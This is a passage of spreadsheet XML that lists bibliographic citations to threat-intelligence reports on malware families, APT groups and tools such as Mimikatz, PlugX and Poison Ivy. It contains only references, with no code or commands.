    <t>Zafra, D. Lunden, K. Brubaker, N. Kennelly, J.. (2020, February 24). Ransomware Against the Machine: How Adversaries are Learning to Disrupt Industrial Production by Targeting IT and OT. Retrieved February 9, 2021.</t>
  </si>
  <si>
    <t>Brubaker, N. Zafra, D. K. Lunden, K. Proska, K. Hildebrandt, C.. (2020, July 15). Financially Motivated Actors Are Expanding Access Into OT: Analysis of Kill Lists That Include OT Processes Used With Seven Malware Families. Retrieved February 15, 2021.</t>
  </si>
  <si>
    <t>ARMmbed. (2018, June 21). Mbed Crypto. Retrieved February 15, 2021.</t>
  </si>
  <si>
    <t>Leong, R., Perez, D., Dean, T. (2019, October 31). MESSAGETAP: Who’s Reading Your Text Messages?. Retrieved May 11, 2020.</t>
  </si>
  <si>
    <t>Erlich, C. (2020, April 3). The Avast Abuser: Metamorfo Banking Malware Hides By Abusing Avast Executable. Retrieved May 26, 2020.</t>
  </si>
  <si>
    <t>ESET Research. (2019, October 3). Casbaneiro: peculiarities of this banking Trojan that affects Brazil and Mexico. Retrieved September 23, 2021.</t>
  </si>
  <si>
    <t>Sierra, E., Iglesias, G.. (2018, April 24). Metamorfo Campaigns Targeting Brazilian Users. Retrieved July 30, 2020.</t>
  </si>
  <si>
    <t>Zhang, X. (2020, February 4). Another Metamorfo Variant Targeting Customers of Financial Institutions in More Countries. Retrieved July 30, 2020.</t>
  </si>
  <si>
    <t>Rascagneres, P., Mercer, W. (2017, June 19). Delphi Used To Score Against Palestine. Retrieved November 13, 2018.</t>
  </si>
  <si>
    <t>Tsarfaty, Y. (2018, July 25). Micropsia Malware. Retrieved November 13, 2018.</t>
  </si>
  <si>
    <t>Deply, B. (n.d.). Mimikatz. Retrieved September 29, 2015.</t>
  </si>
  <si>
    <t>Metcalf, S. (2015, November 13). Unofficial Guide to Mimikatz &amp; Command Reference. Retrieved December 23, 2015.</t>
  </si>
  <si>
    <t>Metcalf, S. (2015, August 7). Kerberos Golden Tickets are Now More Golden. Retrieved December 1, 2017.</t>
  </si>
  <si>
    <t>Metcalf, S. (2015, January 19). Attackers Can Now Use Mimikatz to Implant Skeleton Key on Domain Controllers &amp; BackDoor Your Active Directory Forest. Retrieved February 3, 2015.</t>
  </si>
  <si>
    <t>Deply, B., Le Toux, V. (2016, June 5). module ~ lsadump. Retrieved August 7, 2017.</t>
  </si>
  <si>
    <t>Grafnetter, M. (2015, October 26). Retrieving DPAPI Backup Keys from Active Directory. Retrieved December 19, 2017.</t>
  </si>
  <si>
    <t>Delpy, B. (2017, December 12). howto ~ credential manager saved credentials. Retrieved November 23, 2020.</t>
  </si>
  <si>
    <t>Deply, B., Le Toux, V.. (2016, June 5). module ~ kerberos. Retrieved March 17, 2020.</t>
  </si>
  <si>
    <t>Schroeder, W. (2015, September 22). Mimikatz and DCSync and ExtraSids, Oh My. Retrieved December 4, 2017.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Davis, S. and Caban, D. (2017, December 19). APT34 - New Targeted Attack in the Middle East. Retrieved December 20, 2017.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Mandiant. (2018). Mandiant M-Trends 201Retrieved July 9, 2018.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Cylance. (2014, December). Operation Cleaver. Retrieved September 14, 2017.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Symantec Security Response. (2018, July 25). Leafminer: New Espionage Campaigns Targeting Middle Eastern Regions. Retrieved August 28, 2018.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Smallridge, R. (2018, March 10). APT15 is alive and strong: An analysis of RoyalCli and RoyalDNS. Retrieved April 4, 2018.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ESET Research. (2018, May 22). Turla Mosquito: A shift towards more generic tools. Retrieved July 3, 2018.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Lancaster, T.. (2017, November 14). Muddying the Water: Targeted Attacks in the Middle East. Retrieved March 15, 2018.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Microsoft 365 Defender Team. (2020, December 28). Using Microsoft 365 Defender to protect against Solorigate. Retrieved January 7, 2021.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Positive Technologies. (2016, December 16). Cobalt Snatch. Retrieved October 9, 2018.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Bizeul, D., Fontarensky, I., Mouchoux, R., Perigaud, F., Pernet, C. (2014, July 11). Eye of the Tiger. Retrieved September 29, 2015.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Higgins, K. (2019, January 30). Iran Ups its Traditional Cyber Espionage Tradecraft. Retrieved May 22, 2020.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Symantec. (2018, February 28). Chafer: Latest Attacks Reveal Heightened Ambitions. Retrieved May 22, 2020.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Miller, S, et al. (2019, April 10). TRITON Actor TTP Profile, Custom Attack Tools, Detections, and ATT&amp;CK Mapping. Retrieved April 16, 2019.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Villadsen, O.. (2019, August 29). More_eggs, Anyone? Threat Actor ITG08 Strikes Again. Retrieved September 16, 2019.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Symantec. (2019, March 6). Whitefly: Espionage Group has Singapore in Its Sights. Retrieved May 26, 2020.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Lambert, T. (2020, May 7). Introducing Blue Mockingbird. Retrieved May 26, 2020.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ASERT team. (2018, December 5). STOLEN PENCIL Campaign Targets Academia. Retrieved February 5, 2019.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Joe Slowik. (2018, October 12). Anatomy of an Attack: Detecting and Defeating CRASHOVERRIDE. Retrieved December 18, 2020.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Gregal, H. (2017, May 12). MimiPenguin. Retrieved December 5, 2017.</t>
  </si>
  <si>
    <t>Quist, N. (2020, October 5). Black-T: New Cryptojacking Variant from TeamTNT. Retrieved September 22, 2021.</t>
  </si>
  <si>
    <t>Cimpanu, C.. (2016, September 9). Cryptocurrency Mining Malware Discovered Targeting Seagate NAS Hard Drives. Retrieved October 12, 2016.</t>
  </si>
  <si>
    <t>Kaspersky Lab's Global Research &amp; Analysis Team. (2013, February 27). The MiniDuke Mystery: PDF 0-day Government Spy Assembler 0x29A Micro Backdoor. Retrieved April 5, 2017.</t>
  </si>
  <si>
    <t>Rosenberg, J. (2018, June 14). MirageFox: APT15 Resurfaces With New Tools Based On Old Ones. Retrieved September 21, 2018.</t>
  </si>
  <si>
    <t>Gross, J. (2016, February 23). Operation Dust Storm. Retrieved September 19, 2017.</t>
  </si>
  <si>
    <t>Microsoft. (2011, January 12). Distributed Transaction Coordinator. Retrieved February 25, 2016.</t>
  </si>
  <si>
    <t>DiMaggio, J.. (2015, August 6). The Black Vine cyberespionage group. Retrieved January 26, 2016.</t>
  </si>
  <si>
    <t>Stama, D.. (2015, February 6). Backdoor.Mivast. Retrieved February 15, 2016.</t>
  </si>
  <si>
    <t>Cybereason Nocturnus Team. (2020, December 9). MOLERATS IN THE CLOUD: New Malware Arsenal Abuses Cloud Platforms in Middle East Espionage Campaign. Retrieved December 22, 2020.</t>
  </si>
  <si>
    <t>Bauer A., Kumar A., Hebeisen C., et al. (2019, July). Monokle: The Mobile Surveillance Tooling of the Special Technology Center. Retrieved September 4, 2019.</t>
  </si>
  <si>
    <t>Miller-Osborn, J. and Grunzweig, J.. (2017, March 30). Trochilus and New MoonWind RATs Used In Attack Against Thai Organizations. Retrieved March 30, 2017.</t>
  </si>
  <si>
    <t>Svajcer, V. (2018, July 31). Multiple Cobalt Personality Disorder. Retrieved September 5, 2018.</t>
  </si>
  <si>
    <t>Villadsen, O.. (2019, August 29). More_eggs, Anyone? Threat Actor ITG08 Strikes Again. Retrieved September 16, 2019.</t>
  </si>
  <si>
    <t>Visa Public. (2019, February). FIN6 Cybercrime Group Expands Threat to eCommerce Merchants. Retrieved September 16, 2019.</t>
  </si>
  <si>
    <t>ESET, et al. (2018, January). Diplomats in Eastern Europe bitten by a Turla mosquito. Retrieved July 3, 2018.</t>
  </si>
  <si>
    <t>ESET Research. (2018, May 22). Turla Mosquito: A shift towards more generic tools. Retrieved July 3, 2018.</t>
  </si>
  <si>
    <t>Neville, A. (2012, June 15). Trojan.Naid. Retrieved February 22, 2018.</t>
  </si>
  <si>
    <t>F-Secure Labs. (2016, July). NANHAISHU RATing the South China Sea. Retrieved July 6, 2018.</t>
  </si>
  <si>
    <t>The DigiTrust Group. (2017, January 01). NanoCore Is Not Your Average RAT. Retrieved November 9, 2018.</t>
  </si>
  <si>
    <t>Patel, K. (2018, March 02). The NanoCore RAT Has Resurfaced From the Sewers. Retrieved November 9, 2018.</t>
  </si>
  <si>
    <t>Kasza, A., Halfpop, T. (2016, February 09). NanoCoreRAT Behind an Increase in Tax-Themed Phishing E-mails. Retrieved November 9, 2018.</t>
  </si>
  <si>
    <t>Falcone, R., et al. (2018, August 02). The Gorgon Group: Slithering Between Nation State and Cybercrime. Retrieved August 7, 2018.</t>
  </si>
  <si>
    <t>Davis, S. and Carr, N. (2017, September 21). APT33: New Insights into Iranian Cyber Espionage Group. Retrieved February 15, 2018.</t>
  </si>
  <si>
    <t>Scott-Railton, J., et al. (2016, August 2). Group5: Syria and the Iranian Connection. Retrieved September 26, 2016.</t>
  </si>
  <si>
    <t>Guerrero-Saade, J. (2021, June 1). NobleBaron | New Poisoned Installers Could Be Used In Supply Chain Attacks. Retrieved August 4, 2021.</t>
  </si>
  <si>
    <t>Mercer, W., Rascagneres, P. (2018, May 31). NavRAT Uses US-North Korea Summit As Decoy For Attacks In South Korea. Retrieved June 11, 2018.</t>
  </si>
  <si>
    <t>Bezroutchko, A. (2019, November 19). NBTscan man page. Retrieved March 17, 2021.</t>
  </si>
  <si>
    <t>SecTools. (2003, June 11). NBTscan. Retrieved March 17, 2021.</t>
  </si>
  <si>
    <t>Counter Threat Unit Research Team. (2019, December 29). BRONZE PRESIDENT Targets NGOs. Retrieved April 13, 2021.</t>
  </si>
  <si>
    <t>Microsoft. (n.d.). Nbtstat. Retrieved April 17, 2016.</t>
  </si>
  <si>
    <t>Ladley, F. (2012, May 15). Backdoor.Nerex. Retrieved February 23, 2018.</t>
  </si>
  <si>
    <t>Ladley, F. (2012, May 15). Backdoor.Ritsol. Retrieved February 23, 2018.</t>
  </si>
  <si>
    <t>Microsoft. (2006, October 18). Net.exe Utility. Retrieved September 22, 2015.</t>
  </si>
  <si>
    <t>Savill, J. (1999, March 4). Net.exe reference. Retrieved September 22, 2015.</t>
  </si>
  <si>
    <t>Microsoft. (2017, February 14). Net Commands On Windows Operating Systems. Retrieved March 19, 2020.</t>
  </si>
  <si>
    <t>Microsoft. (n.d.). Net Use. Retrieved November 25, 2016.</t>
  </si>
  <si>
    <t>Microsoft. (n.d.). Net time. Retrieved November 25, 2016.</t>
  </si>
  <si>
    <t>Alperovitch, D. (2014, July 7). Deep in Thought: Chinese Targeting of National Security Think Tanks. Retrieved November 12, 2014.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Dell SecureWorks Counter Threat Unit Special Operations Team. (2015, May 28). Living off the Land. Retrieved January 26, 2016.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Falcone, R. and Lee, B.. (2016, May 26). The OilRig Campaign: Attacks on Saudi Arabian Organizations Deliver Helminth Backdoor. Retrieved May 3, 2017.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Hanel, A. (2019, January 10). Big Game Hunting with Ryuk: Another Lucrative Targeted Ransomware. Retrieved May 12, 2020.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Cylance. (2014, December). Operation Cleaver. Retrieved September 14, 2017.</t>
  </si>
  <si>
    <t>Microsoft. (n.d.). Using Netsh. Retrieved February 13, 2017.</t>
  </si>
  <si>
    <t>Demaske, M. (2016, September 23). USING NETSHELL TO EXECUTE EVIL DLLS AND PERSIST ON A HOST. Retrieved April 8, 2017.</t>
  </si>
  <si>
    <t>Microsoft. (2009, June 3). Netsh Commands for Windows Firewall. Retrieved April 20, 2016.</t>
  </si>
  <si>
    <t>Kaspersky Lab's Global Research and Analysis Team. (2017, February 8). Fileless attacks against enterprise networks. Retrieved February 8, 2017.</t>
  </si>
  <si>
    <t>Group-IB and Fox-IT. (2014, December). Anunak: APT against financial institutions. Retrieved April 20, 2016.</t>
  </si>
  <si>
    <t>Novetta Threat Research Group. (2016, February 24). Operation Blockbuster: Loaders, Installers and Uninstallers Report. Retrieved March 2, 2016.</t>
  </si>
  <si>
    <t>Microsoft. (n.d.). Netstat. Retrieved April 17, 2016.</t>
  </si>
  <si>
    <t>Kaspersky Lab's Global Research and Analysis Team. (n.d.). The NetTraveler (aka ‘Travnet’). Retrieved November 12, 2014.</t>
  </si>
  <si>
    <t>Victor, K.. (2020, May 18). Netwalker Fileless Ransomware Injected via Reflective Loading . Retrieved May 26, 2020.</t>
  </si>
  <si>
    <t>Szappanos, G., Brandt, A.. (2020, May 27). Netwalker ransomware tools give insight into threat actor. Retrieved May 27, 2020.</t>
  </si>
  <si>
    <t>O'Leary, J., et al. (2017, September 20). Insights into Iranian Cyber Espionage: APT33 Targets Aerospace and Energy Sectors and has Ties to Destructive Malware. Retrieved February 15, 2018.</t>
  </si>
  <si>
    <t>McAfee. (2015, March 2). Netwire RAT Behind Recent Targeted Attacks. Retrieved February 15, 2018.</t>
  </si>
  <si>
    <t>Lambert, T. (2020, January 29). Intro to Netwire. Retrieved January 7, 2021.</t>
  </si>
  <si>
    <t>Proofpoint. (2020, December 2). Geofenced NetWire Campaigns. Retrieved January 7, 2021.</t>
  </si>
  <si>
    <t>Maniath, S. and Kadam P. (2019, March 19). Dissecting a NETWIRE Phishing Campaign's Usage of Process Hollowing. Retrieved January 7, 2021.</t>
  </si>
  <si>
    <t>Livelli, K, et al. (2018, November 12). Operation Shaheen. Retrieved May 1, 2019.</t>
  </si>
  <si>
    <t>Cimpanu, C. (2018, September 13). Sly malware author hides cryptomining botnet behind ever-shifting proxy service. Retrieved September 15, 2020.</t>
  </si>
  <si>
    <t>Cyware. (2019, May 29). Cyber attackers leverage tunneling service to drop Lokibot onto victims’ systems. Retrieved September 15, 2020.</t>
  </si>
  <si>
    <t>Segura, J. (2020, February 26). Fraudsters cloak credit card skimmer with fake content delivery network, ngrok server. Retrieved September 15, 2020.</t>
  </si>
  <si>
    <t>Borja, A. Camba, A. et al (2020, September 14). Analysis of a Convoluted Attack Chain Involving Ngrok. Retrieved September 15, 2020.</t>
  </si>
  <si>
    <t>Orleans, A. (2020, August 31). Who Is PIONEER KITTEN?. Retrieved December 21, 2020.</t>
  </si>
  <si>
    <t>DiMaggio, J.. (2016, March 15). Suckfly: Revealing the secret life of your code signing certificates. Retrieved August 3, 2016.</t>
  </si>
  <si>
    <t>Sponchioni, R.. (2016, March 11). Backdoor.Nidiran. Retrieved August 3, 2016.</t>
  </si>
  <si>
    <t>Microsoft. (2006, October 30). How to use the SysKey utility to secure the Windows Security Accounts Manager database. Retrieved August 3, 2016.</t>
  </si>
  <si>
    <t>DiMaggio, J.. (2016, May 17). Indian organizations targeted in Suckfly attacks. Retrieved August 3, 2016.</t>
  </si>
  <si>
    <t>Fidelis Cybersecurity. (2013, June 28). Fidelis Threat Advisory #1009: "njRAT" Uncovered. Retrieved June 4, 2019.</t>
  </si>
  <si>
    <t>Dawda, U. and Villeneuve, N. (2013, August 30). Njw0rm - Brother From the Same Mother. Retrieved June 4, 2019.</t>
  </si>
  <si>
    <t>Pascual, C. (2018, November 27). AutoIt-Compiled Worm Affecting Removable Media Delivers Fileless Version of BLADABINDI/njRAT Backdoor. Retrieved June 4, 2019.</t>
  </si>
  <si>
    <t>Huss, D. (2016, March 1). Operation Transparent Tribe. Retrieved June 8, 2016.</t>
  </si>
  <si>
    <t>ss6(n.d.). NLTEST.exe - Network Location Test. Retrieved February 14, 2019.</t>
  </si>
  <si>
    <t>Bacurio Jr., F. and Salvio, J. (2018, April 9). Trickbot’s New Reconnaissance Plugin. Retrieved February 14, 2019.</t>
  </si>
  <si>
    <t>The DFIR Report. (2020, October 18). Ryuk in 5 Hours. Retrieved October 19, 2020.</t>
  </si>
  <si>
    <t>Tim Strazzere. (2014, November 19). The new NotCompatible: Sophisticated and evasive threat harbors the potential to compromise enterprise networks. Retrieved December 22, 2016.</t>
  </si>
  <si>
    <t>Chiu, A. (2016, June 27). New Ransomware Variant "Nyetya" Compromises Systems Worldwide. Retrieved March 26, 2019.</t>
  </si>
  <si>
    <t>US-CERT. (2017, July 1). Alert (TA17-181A): Petya Ransomware. Retrieved March 15, 2019.</t>
  </si>
  <si>
    <t>Cherepanov, A.. (2017, June 30). TeleBots are back: Supply chain attacks against Ukraine. Retrieved June 11, 2020.</t>
  </si>
  <si>
    <t>Russinovich, M. (2004, June 28). PsExec. Retrieved December 17, 2015.</t>
  </si>
  <si>
    <t>NCSC. (2020, February 20). NCSC supports US advisory regarding GRU intrusion set Sandworm. Retrieved June 10, 2020.</t>
  </si>
  <si>
    <t>Veo Zhang. (2013, June 13). Cybercriminals Improve Android Malware Stealth Routines with OBAD. Retrieved December 9, 2016.</t>
  </si>
  <si>
    <t>Malhotra, A. (2021, March 2). ObliqueRAT returns with new campaign using hijacked websites. Retrieved September 2, 2021.</t>
  </si>
  <si>
    <t>Malhotra, A. et al. (2021, May 13). Transparent Tribe APT expands its Windows malware arsenal. Retrieved September 2, 2021.</t>
  </si>
  <si>
    <t>Sherstobitoff, R., Malhotra, A. (2018, October 18). ‘Operation Oceansalt’ Attacks South Korea, U.S., and Canada With Source Code From Chinese Hacker Group. Retrieved November 30, 2018.</t>
  </si>
  <si>
    <t>Kaspersky Lab's Global Research &amp; Analysis Team. (2018, October 15). Octopus-infested seas of Central Asia. Retrieved November 14, 2018.</t>
  </si>
  <si>
    <t>Paganini, P. (2018, October 16). Russia-linked APT group DustSquad targets diplomatic entities in Central Asia. Retrieved August 24, 2021.</t>
  </si>
  <si>
    <t>Cherepanov, A. (2018, October 4). Nomadic Octopus Cyber espionage in Central Asia. Retrieved October 13, 2021.</t>
  </si>
  <si>
    <t>Hromcova, Z. (2019, July). OKRUM AND KETRICAN: AN OVERVIEW OF RECENT KE3CHANG GROUP ACTIVITY. Retrieved May 6, 2020.</t>
  </si>
  <si>
    <t>Sudhir K Bansal. (2014, January 28). First widely distributed Android bootkit Malware infects more than 350,000 Devices. Retrieved December 21, 2016.</t>
  </si>
  <si>
    <t>Mercer, W. and Rascagneres, P. (2018, February 12). Olympic Destroyer Takes Aim At Winter Olympics. Retrieved March 14, 2019.</t>
  </si>
  <si>
    <t>CrowdStrike. (2019, January). 2019 Global Threat Report. Retrieved June 10, 2020.</t>
  </si>
  <si>
    <t>Secureworks. (2020, May 1). IRON VIKING Threat Profile. Retrieved June 10, 2020.</t>
  </si>
  <si>
    <t>Lee, B., Falcone, R. (2018, February 23). OopsIE! OilRig Uses ThreeDollars to Deliver New Trojan. Retrieved July 16, 2018.</t>
  </si>
  <si>
    <t>Falcone, R., et al. (2018, September 04). OilRig Targets a Middle Eastern Government and Adds Evasion Techniques to OopsIE. Retrieved September 24, 2018.</t>
  </si>
  <si>
    <t>Carbon Black Threat Analysis Unit. (2019, February 12). New macOS Malware Variant of Shlayer (OSX) Discovered. Retrieved August 8, 2019.</t>
  </si>
  <si>
    <t>Long, Joshua. (2018, February 21). OSX/Shlayer: New Mac malware comes out of its shell. Retrieved August 28, 2019.</t>
  </si>
  <si>
    <t>Phil Stokes. (2020, September 8). Coming Out of Your Shell: From Shlayer to ZShlayer. Retrieved September 13, 2021.</t>
  </si>
  <si>
    <t>Vrijenhoek, Jay. (2018, April 24). New OSX/Shlayer Malware Variant Found Using a Dirty New Trick. Retrieved September 6, 2019.</t>
  </si>
  <si>
    <t>Reed, Thomas. (2018, April 24). New Crossrider variant installs configuration profiles on Macs. Retrieved September 6, 2019.</t>
  </si>
  <si>
    <t>Patrick Wardle. (2020, August 30). Apple Approved Malware malicious code ...now notarized!? #2020. Retrieved September 13, 2021.</t>
  </si>
  <si>
    <t>Jaron Bradley. (2021, April 26). Shlayer malware abusing Gatekeeper bypass on macOS. Retrieved September 22, 2021.</t>
  </si>
  <si>
    <t>Horejsi, J. (2018, April 04). New MacOS Backdoor Linked to OceanLotus Found. Retrieved November 13, 2018.</t>
  </si>
  <si>
    <t>Magisa, L. (2020, November 27). New MacOS Backdoor Connected to OceanLotus Surfaces. Retrieved December 2, 2020.</t>
  </si>
  <si>
    <t>Phil Stokes. (2020, December 2). APT32 Multi-stage macOS Trojan Innovates on Crimeware Scripting Technique. Retrieved September 13, 2021.</t>
  </si>
  <si>
    <t>Dumont, R.. (2019, April 9). OceanLotus: macOS malware update. Retrieved April 15, 2019.</t>
  </si>
  <si>
    <t>Peretz, A. and Theck, E. (2021, March 5). Earth Vetala – MuddyWater Continues to Target Organizations in the Middle East. Retrieved March 18, 2021.</t>
  </si>
  <si>
    <t>ANSSI. (2021, January 27). SANDWORM INTRUSION SET CAMPAIGN TARGETING CENTREON SYSTEMS. Retrieved March 30, 2021.</t>
  </si>
  <si>
    <t>NCCIC. (2017, February 10). Enhanced Analysis of GRIZZLY STEPPE Activity. Retrieved April 12, 2021.</t>
  </si>
  <si>
    <t>SecureWorks. (2013). The Lifecycle of Peer-to-Peer (Gameover) ZeuS. Retrieved August 19, 2015.</t>
  </si>
  <si>
    <t>Mullaney, C. &amp; Honda, H. (2012, May 4). Trojan.Pasam. Retrieved February 22, 2018.</t>
  </si>
  <si>
    <t>ClearSky. (2020, February 16). Fox Kitten – Widespread Iranian Espionage-Offensive Campaign. Retrieved December 21, 2020.</t>
  </si>
  <si>
    <t>Check Point. (2020, November 6). Ransomware Alert: Pay2Key. Retrieved January 4, 2021.</t>
  </si>
  <si>
    <t>Mike Murray. (2017, April 3). Pegasus for Android: the other side of the story emerges. Retrieved April 16, 2017.</t>
  </si>
  <si>
    <t>Rich Cannings et al.. (2017, April 3). An investigation of Chrysaor Malware on Android. Retrieved April 16, 2017.</t>
  </si>
  <si>
    <t>Lookout. (2016). Technical Analysis of Pegasus Spyware. Retrieved December 12, 2016.</t>
  </si>
  <si>
    <t>Bill Marczak and John Scott-Railton. (2016, August 24). The Million Dollar Dissident: NSO Group’s iPhone Zero-Days used against a UAE Human Rights Defender. Retrieved December 12, 2016.</t>
  </si>
  <si>
    <t>Baumgartner, K. and Raiu, C. (2014, December 8). The ‘Penquin’ Turla. Retrieved March 11, 2021.</t>
  </si>
  <si>
    <t>Leonardo. (2020, May 29). MALWARE TECHNICAL INSIGHT TURLA “Penquin_x64”. Retrieved March 11, 2021.</t>
  </si>
  <si>
    <t>Falcone, R. and Conant S. (2016, March 25). ProjectM: Link Found Between Pakistani Actor and Operation Transparent Tribe. Retrieved September 2, 2021.</t>
  </si>
  <si>
    <t>Trustwave SpiderLabs. (2020, June 22). Pillowmint: FIN7’s Monkey Thief . Retrieved July 27, 2020.</t>
  </si>
  <si>
    <t>Microsoft. (n.d.). Ping. Retrieved April 8, 2016.</t>
  </si>
  <si>
    <t>Alperovitch, D. (2014, July 7). Deep in Thought: Chinese Targeting of National Security Think Tanks. Retrieved November 12, 2014.</t>
  </si>
  <si>
    <t>Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.</t>
  </si>
  <si>
    <t>Tartare, M. et al. (2020, May 21). No “Game over” for the Winnti Group. Retrieved August 24, 2020.</t>
  </si>
  <si>
    <t>Grunzweig, J., et al. (2016, May 24). New Wekby Attacks Use DNS Requests As Command and Control Mechanism. Retrieved August 17, 2016.</t>
  </si>
  <si>
    <t>Tomonaga, S.. (2018, June 8). PLEAD Downloader Used by BlackTech. Retrieved May 6, 2020.</t>
  </si>
  <si>
    <t>Tomonaga, S.. (2018, March 6). Malware “TSCookie”. Retrieved May 6, 2020.</t>
  </si>
  <si>
    <t>Cherepanov, A.. (2018, July 9). Certificates stolen from Taiwanese tech‑companies misused in Plead malware campaign. Retrieved May 6, 2020.</t>
  </si>
  <si>
    <t>Su, V. et al. (2019, December 11). Waterbear Returns, Uses API Hooking to Evade Security. Retrieved February 22, 2021.</t>
  </si>
  <si>
    <t>Vasilenko, R. (2013, December 17). An Analysis of PlugX Malware. Retrieved November 24, 2015.</t>
  </si>
  <si>
    <t>Scott, M.. (2014, June 10). Clandestine Fox, Part Deux. Retrieved January 14, 2016.</t>
  </si>
  <si>
    <t>Miller-Osborn, J., Grunzweig, J.. (2015, April). Unit 42 Identifies New DragonOK Backdoor Malware Deployed Against Japanese Targets. Retrieved November 4, 2015.</t>
  </si>
  <si>
    <t>Computer Incident Response Center Luxembourg. (2013, March 29). Analysis of a PlugX variant. Retrieved November 5, 2018.</t>
  </si>
  <si>
    <t>Huss, D., et al. (2017, February 2). Oops, they did it again: APT Targets Russia and Belarus with ZeroT and PlugX. Retrieved April 5, 2018.</t>
  </si>
  <si>
    <t>Stewart, A. (2014). DLL SIDE-LOADING: A Thorn in the Side of the Anti-Virus Industry. Retrieved November 12, 2014.</t>
  </si>
  <si>
    <t>Lancaster, T. and Idrizovic, E.. (2017, June 27). Paranoid PlugX. Retrieved July 13, 2017.</t>
  </si>
  <si>
    <t>Lancaster, T., Idrizovic, E. (2017, June 27). Paranoid PlugX. Retrieved April 19, 2019.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>United States District Court Southern District of New York (USDC SDNY) . (2018, December 17). United States of America v. Zhu Hua and Zhang Shilong. Retrieved April 17, 2019.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Axel F. (2017, April 27). APT Targets Financial Analysts with CVE-2017-019Retrieved February 15, 2018.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Hamzeloofard, S. (2020, January 31). New wave of PlugX targets Hong Kong | Avira Blog. Retrieved April 13, 2021.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Mercer, W, et al. (2020, April 16). PoetRAT: Python RAT uses COVID-19 lures to target Azerbaijan public and private sectors. Retrieved April 27, 2020.</t>
  </si>
  <si>
    <t>Mercer, W. Rascagneres, P. Ventura, V. (2020, October 6). PoetRAT: Malware targeting public and private sector in Azerbaijan evolves . Retrieved April 9, 2021.</t>
  </si>
  <si>
    <t>FireEye. (2014). POISON IVY: Assessing Damage and Extracting Intelligence. Retrieved November 12, 2014.</t>
  </si>
  <si>
    <t>Hayashi, K. (2005, August 18). Backdoor.Darkmoon. Retrieved February 23, 2018.</t>
  </si>
  <si>
    <t>Payet, L. (2014, September 19). Life on Mars: How attackers took advantage of hope for alien existance in new Darkmoon campaign. Retrieved September 13, 2018.</t>
  </si>
  <si>
    <t>McCormack, M. (2017, September 15). Backdoor:Win32/Poisonivy.E. Retrieved December 21, 2020.</t>
  </si>
  <si>
    <t>Ray, V., et al. (2016, November 22). Tropic Trooper Targets Taiwanese Government and Fossil Fuel Provider With Poison Ivy. Retrieved December 18, 2020.</t>
  </si>
  <si>
    <t>Anubhav, A., Kizhakkinan, D. (2017, February 22). Spear Phishing Techniques Used in Attacks Targeting the Mongolian Government. Retrieved February 24, 2017.</t>
  </si>
  <si>
    <t>US District Court Southern District of New York. (2018, December 17). United States v. Zhu Hua Indictment. Retrieved December 17, 2020.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Villeneuve, N., Homan, J. (2014, July 31). Spy of the Tiger. Retrieved September 29, 2015.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Haq, T., Moran, N., Scott, M., &amp; Vashisht, S. O. (2014, September 10). The Path to Mass-Producing Cyber Attacks [Blog]. Retrieved November 12, 2014.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Ray, V. (2016, November 22). Tropic Trooper Targets Taiwanese Government and Fossil Fuel Provider With Poison Ivy. Retrieved November 9, 2018.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ClearSky Cybersecurity. (2016, June 9). Operation DustySky - Part Retrieved August 3, 2016.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Villeneuve, N., Haq, H., Moran, N. (2013, August 23). OPERATION MOLERATS: MIDDLE EAST CYBER ATTACKS USING POISON IVY. Retrieved April 1, 2016.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Kaspersky Lab's Global Research &amp; Analysis Team. (2017, August 8). APT Trends report Q2 201Retrieved February 15, 2018.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>hasherezade. (2016, April 11). No money, but Pony! From a mail to a trojan horse. Retrieved May 21, 2020.</t>
  </si>
  <si>
    <t>Nettitude. (2018, July 23). Python Server for PoshCRetrieved April 23, 2019.</t>
  </si>
  <si>
    <t>Ackerman, G., et al. (2018, December 21). OVERRULED: Containing a Potentially Destructive Adversary. Retrieved January 17, 2019.</t>
  </si>
  <si>
